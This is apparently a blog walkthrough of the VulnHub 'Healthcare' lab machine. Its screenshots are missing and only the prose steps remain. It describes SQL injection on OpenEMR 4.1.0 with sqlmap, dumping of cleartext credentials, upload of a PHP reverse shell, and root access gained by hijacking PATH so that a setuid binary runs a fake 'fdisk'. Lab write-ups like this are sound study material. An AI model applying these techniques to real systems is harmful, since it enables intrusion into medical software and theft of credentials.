AdSense

Tuesday, March 1, 2022

Healthcare

HEALTHCARE

- Layout for this exercise:











1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Healthcare, from the VulnHub pentesting platform.

Healthcare can be downloaded from here:

https://www.vulnhub.com/entry/healthcare-1,522/

- Once the virtual machine downloaded and extracted with VirtualBox:














2 - ENUMERATION

- Discovering IP 192.168.1.46:













- Scanning with Nmap:


- Scanning deeper port 21:









- Scanning deeper port 80:












- Browsing the web server:





















- View-sourcing there are some misleading information:















- For instance folder /admin leads to nothing:














- Dirbusting with rockyou.txt:




- There is a hidden folder called openemr:



- Openemr is a medical management application:























3 - EXPLOITATION

- Looking for exploits for Openemr version 4.1.0:











- Reading 49742.py there is a vulnerable injection point that can be used with Sqlmap:

























- Looking for databases with Sqlmap:














- Looking for tables inside database openemr:










.....................................



- Dumping all about table users we find cleartext passwords for two users:









- So finally we have credentials admin:ackbar and medical:medical.

- Logging into Openemr as user admin:










- There is a management interface for user admin:












- Files at website are stored at /var/www/html/openemr/sites/default:






















- Let's create an exploit named myshell.php:




- Uploading myshell.php to /var/www/html/openemr/sites/default it's not allowed:




- However it is feasible to upload myshell.php to /openemr:










- Setting a listening session at port 3333:





- Now, just calling myshell.php with curl we have a remote shell:






4 - CAPTURING THE 1st FLAG

- Browsing the /home folder we find an additional user called almirant:









- Inside almirant's home folder we find user.txt and the 1st flag:










......................................













5 - PRIVILEGE ESCALATION

- Looking for files with setuid bit:






- For instance file healthcheck, owned by root, it can be run by user medical because of the setuid bit:








- Running healthcheck:






























- Applying strings to healthcheck we discover that it uses some commands like fdisk, ifconfig, du, ... without the whole path (/bin, /sbin):












- So moving to /tmp let's write a new script fdisk containing /bin/bash, and then let's update enviroment variable PATH pointing to /tmp:


- Now, when healtcheck (owned by root) calls to fdisk it will execute /bin/bash as a root.

- Running again healthcheck we have finally a root shell:


























6 - CAPTURING THE 2nd FLAG

- Reading root.txt:





















Posted by at
Labels: